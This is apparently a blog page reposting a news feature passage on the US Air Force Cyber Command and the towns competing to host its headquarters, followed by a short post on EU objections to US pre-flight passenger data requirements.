"It makes us nimble," says Elder. "It means we can react quickly to change." But, he cautions, there's no plan to consolidate all those pieces in one location. Such a move would run counter to Air Force policies of decentralized commands.

Not everyone is enthusiastic about the reorganization. Defense expert John Pike, director of GlobalSecurity.org, says the Cyber Command's mission is murky. "There's been so much gee-whiz flackery to this," Pike says. "They've got the whole thing tarted up, and it's hard to tell what they're actually doing."

Pike says the Cyber Command may be part of a secret Air Force plan to prepare for war against China, already suspected of trying to hack Department of Defense networks. He says the new command's defensive mission is muddled and duplicative: The NSA already defends military networks. As for civilian infrastructures like the internet and power grid, they're privately owned, and the Air Force has no jurisdiction over them.

Lord concedes that the Air Force can't do much on its own to protect civilian systems. "We're worrying about the ability of someone to interrupt Wall Street and crash the economy," he says. "We're having a hard time getting Wall Street to work with us."

On the offensive side, though, everything is on the table, from jamming an enemy's radar to infiltrating its command-and-control networks. Someday, the Cyber Command may be able to hack an enemy's security and radar systems, improving the chances of bombs hitting home.

"It's the entire electromagnetic spectrum," says Lord. "Many of the elements that form (Cyber Command) come from our communications and intel operations. The internet is obviously part, but it also includes things like cellphone frequencies, high-power microwaves and directed-energy components.

"What if we could spoof the enemy, to get them to operate on a set of assumptions by altering their data?" Lord asks. "We talk about being able to change the enemy's behavior without a kinetic application. Weapons of mass disruption."

Cold War Sites Compete for the Code War

When the Cyber Command was formally announced in September, the competition began immediately. Rural Yuba City, California -- the home of Beale Air Force Base -- rounded up 53 signatures from the state's congressional delegation, including Sen. Dianne Feinstein, to try to plant the Cyber Command on California's fertile soil. In a newspaper interview, community leader Ron Bartoli touted Yuba's access to Silicon Valley, which lies about 170 miles away, and argued that cyberwarfare is consistent with Golden State values. "It's computers, it's green, it's everything California says they want."

Eight hundred miles away in San Antonio, U.S. Rep. Ciro Rodriguez (D-Texas) was explaining the high-tech acumen of his community. "The robust cyber-security research community in San Antonio has transformed the Alamo City into a national leader on the subject," he said in a statement. In the Rockies, Colorado Springs came late to the party, but offered the coolest location: inside Cheyenne Mountain, which once served as headquarters of the North American Aerospace Defense Command (NORAD), but is now used mostly for training.

In the heartland, architecture students at the University of Nebraska-Lincoln held an exhibition to come up with potential building designs for the Cyber Command, producing 13 detailed drawings resembling bunkers, platforms and a burnished black wedge. "I believe the ... proposals may play a provocative role in the future planning of such a free-standing facility," architecture professor Chris Ford said in a press release.

Nebraska has long held a unique post in America's defensive footing, and it's mounting a particularly hungry bid for the Cyber Command. In 1948, Offutt Air Force Base was selected for the headquarters of the Strategic Air Command, the linchpin of America's nuclear strategy. Square in the middle of the North American continent, the site was out of reach of existing bombers and missiles.

Now called the U.S. Strategic Command, the drab, concrete headquarters building still anchors Offutt to the nuclear era, with three above-ground floors and four more underground housing a 14,000-square-foot command center that directs all U.S. nuclear forces. It's designed with its own power generator and food supply, so it can be sealed off in the event of a nuclear attack.

Comparisons between nuclear and cyberweapons might seem strained, but there's at least one commonality. Scholars exploring the ethics of wielding logic bombs, Trojan horses, worms and bots in wartime often find themselves treading on ground tilled by an earlier generation of Cold War nuclear gamesmen.

"There are lots of unknowns with a cyberattack," says Neil Rowe, a professor at the Center for Information Security Research at the U.S. Naval Postgraduate School, who rejects cyberattacks as a legitimate tool of war. "The potential for collateral damage is worse than nuclear technology.... With cyber, it can spread through the civilian infrastructure and affect far more civilians."

No Geographic Edge

But ethical concerns aren't weighing down the rainmakers wooing the Cyber Command; they're more concerned with local families and future investment. And without the geographic edge that landed the Strategic Air Command in their backyard a half-century ago, community leaders in Omaha and nearby Bellevue are finding new ways to tempt the decision makers in Washington.

"We've offered a package that includes land, facilities, and a demographic of strong academics and industrial consortium," says Megan Lucas, president of the Bellevue Chamber of Commerce. "We have the infrastructure, dual power grids and dark fiber."

Lucas is a key organizer in the region's yearlong campaign to land the Cyber Command at Offutt. Smart and straightforward, Lucas is so well-known among Offutt staff that they keep track of her schedule, and when the previous base commander, then-Brig. Gen. T. C. Jones, left Offutt, he designated her his honorary wingman. A photo of Lucas in her black-leather bomber jacket hangs outside the headquarters office.

Lucas and other local leaders persuaded the Omaha Development Foundation to put together a purchase of 136 acres of snow-crunched land immediately south of the base for expansion. Bellevue's entire economic engine and its community are wrapped around Offutt, she says. Nearly half the people in the town of 49,000 are active-duty or retired military.

Talk of the Cyber Command has gotten around in Bellevue. In the lounge at the Leopard Lanes bowling alley, a Desert Storm veteran named Jim Chappell runs the karaoke machine on weekends. He says he's heard about the competition. "Maybe Offutt will get it, they're wired for it," he says, lighting a cigarette with his father's Zippo. "That's how dealing with the government is. You have to spend money to attract it. But there's plenty of money and work here either way."

"It's all political, where they decide to put it," says Lucas. "We're clearly the best situated and equipped. But that doesn't mean we'll get it."

"We Are Our Own Worst Enemy"

Inside the Air Force Network Operations Center at Barksdale, a tan, windowless building in the northwest corner of the base, the cyberwar is in full pitch. But the internet jihadists and Chinese hacker troops the Cyber Command is expecting so far haven't materialized. Spammers are the enemy today.

Airmen and women sit at rows of computer tables staring at Dell-branded LCD monitors. On one wall, a huge screen is slashed into quadrants with maps and coordinates, while in the next room, more personnel watch a similar display showing sports and news channels.

"Because you're here, we've put this up instead of the classified information that was up there," Lt. Col. Ken Vantiger says. "As soon as you leave, we'll go back to classified operations."

Capt. Scott Hinck, crew commander at the center, works the defensive side of the room, monitoring what's being done at Barksdale, and what's coming in from Lackland. He says it's pretty clear where their greatest vulnerability lies. "We are our own worst enemy," Hinck says. "Our network connects more than a million Air Force users, and you can only do so much to secure your software."

Air Force users are forbidden, both by direct order and by a government firewall, from using Hotmail, Yahoo, Gmail, Facebook, MySpace, Flickr and dozens of other sites, Hinck says. "Social network sites are such a security liability, not just for attacks, but for the information people post about themselves.... We have direct evidence (correlating) the release of information to responsive attacks and changes in the enemy's strategies."

Even with the restrictions, Air Force network users still get plenty of attacks from phishers, malicious e-mail and hostile "Click Here" links, Hinck says. "We fended off eight attacks in the last hour."

Hoping For Too Much?

It's a heady time for the Cyber Command. The Air Force just graduated its first group of electronic warriors in December from a 38-day training program at Hurlburt Air Force Base in Florida. The graduates came from both officer and enlisted ranks, according to 1st Lt. Ashley Connor, a spokeswoman with the base.

Cyber warriors first train with the 229th Information Operations Squadron in Vermont, then come to Hurlburt for further training with the 39th Information Operations Squadron. Hurlburt expects to graduate about a hundred warriors a year, Connor says.

With the troops arriving, Lord has a tight deadline to get the new command headquarters running at its permanent location by October 2008, with the operation fully established by 2009. The short list of top contenders for the Cyber Command is expected from the secretary of the Air Force in February, and the Air Force brass is watching the heated battle with a mix of awe and dismay.

"All the locations came forward on their own," says Ed Gulick, spokesman for the secretary of the Air Force. "The Air Force has not solicited them."

Lord's boss, Elder, says he appreciates the efforts of the communities competing for the command, but he's concerned that they're expecting too much from it. "This will be a good deal for the community where it is set up," he says. "It will attract contractor presence. But not an industry -- manufacturing jobs."

"I worry that they are looking at this as the opposite of BRAC," Elder adds, referring to the Base Realignment and Closure process that's mostly shrinking bases and chipping into base-reliant communities. "It's not going to be on that scale."

Windfall or not, Barksdale-booster Spohn is confident that his community will prevail in the ersatz cyberwar. He even has plans to build an additional 380,000 square feet of offices to house educational, research and manufacturing operations near the base. While everyone is taciturn publicly, he's convinced he's seen winks and nods from Air Force bigwigs.

"In as many ways as they can tell us they're committed, they've told us," Spohn says. Lapsing into military-speak, he adds, "My confidence is high."

Posted in | 0 comments

EU squeals over US pre-flight personal data grab

EU officials are crying foul over Department of Homeland Security attempts to impose draconian and invasive data requirements on passengers travelling to the US. The US demands, however, are remarkably similar to the ones the EU itself proposes to make of passengers travelling to Europe, making the officials shouting "blackmail" and "troublesome" somewhat unlikely guardians of the citizenry's freedoms.

The problem for Brussels, essentially, is not that the DHS is making the requirements but that it's making them without giving Brussels enough of a chance to play too, and it's striking deals with individual member states. DHS officials are said to be circulating a ten page memorandum of understanding to EU member states which do not currently qualify for the US Visa Waiver Programme (these are mainly Eastern European new-entrants), but which could achieve visa-free travel under the new-look system if they'll just sign here.

We covered this some months ago. Essentially the DHS intends to introduce a 'clear to fly' pre-authorisation system whereby would-be travellers submit their details online prior to buying a ticket. This, the Electronic Travel Authorization (ETA) system, is described by the DHS as a continuation of the VWP, but could just as readily (although less photogenically) be described as online visas for all. Brussels doesn't actually oppose it because it wants to play too, and just last month EU Justice Commissioner Franco Frattini reiterated this, calling on the EU and the US to work together to set up a compatible system.

Brussels, however, has been ineffectual when it comes to getting the non-VWP EU states into the VWP, allowing the DHS to sell ETA to these as a massive convenience, even a liberalisation. As Czech deputy prime minister Alexandr Vondra told the Guardian: "There was no help, no solidarity in the past. It's in our interest to move ahead. We can't just wait and do nothing. We have to act in the interest of our citizens."

Richard Barth from the DHS visited Prague last week, and generally positive local reports viewed a bilateral agreement as a near certainty. Other non-VWP states thought likely to jump include Estonia and Greece.

Posted in | 0 comments